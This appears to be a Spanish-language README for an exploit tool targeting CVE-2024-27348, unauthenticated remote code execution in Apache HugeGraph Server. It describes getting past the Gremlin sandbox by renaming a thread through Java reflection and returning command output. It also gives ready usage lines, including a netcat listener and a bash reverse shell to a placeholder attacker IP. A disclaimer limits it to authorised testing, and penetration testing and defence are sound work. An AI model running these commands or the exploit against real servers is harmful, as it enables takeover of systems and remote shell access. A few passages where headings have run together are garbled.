
Exploit PoC avanzado para CVE-2024-27348, que logra RCE confiable en Apache HugeGraph mediante omisión de sandbox y ejecución de comandos no ciega.
Un exploit de Prueba de Concepto (PoC) avanzado y altamente fiable para CVE-2024-27348 (Ejecución Remota de Código en Apache HugeGraph Server).
A diferencia de muchos PoCs públicos que ejecutan comandos a ciegas o fallan en cargas útiles complejas debido a las limitaciones de Runtime.exec() de Java, este script está diseñado para fiabilidad en escenarios reales de pruebas de penetración.
Solo para fines educativos y pruebas autorizadas. Esta herramienta se proporciona a investigadores de seguridad, probadores de penetración y administradores de sistemas para verificar la vulnerabilidad en entornos autorizados. El autor no se hace responsable del mal uso o daños causados por esta herramienta.
Este exploit mejora los PoCs públicos tempranos al abordar tres problemas críticos:
gremlin-server-exec-* o task-worker-*. Esta carga útil utiliza Reflexión de Java para renombrar dinámicamente el hilo de ejecución a BypassThread antes de activar la carga útil, evadiendo sin problemas el gestor de seguridad.Runtime.getRuntime().exec(String), que rompe comandos bash complejos (como shells inversas) en los espacios, este exploit usa ProcessBuilder con un List<String> correctamente formateado. Esto permite la ejecución segura de cargas útiles complejas con comillas y redirecciones.InputStream del proceso ejecutado usando un Scanner de Java y devuelve la salida real del comando en la respuesta HTTP JSON. Ves exactamente lo que ve el servidor.requestsInstala las dependencias necesarias:
pip3 install requests
python3 exploit.py -u <TARGET_URL> -c <COMMAND>
Ejemplos
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "whoami"
# On your attacker machine, start a listener:
nc -lvnp 4444
# Execute the exploit:
python3 exploit.py -u [http://192.168.X.X:80](http://192.168.X.X:80) -c "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
Apache HugeGraph Server expone un endpoint de API Gremlin (/gremlin) que permite a los usuarios enviar scripts de Groovy. Debido a un sandboxing insuficiente en versiones anteriores al parche, un atacante no autenticado puede ejecutar comandos arbitrarios del sistema operativo a través de la Reflexión de Java.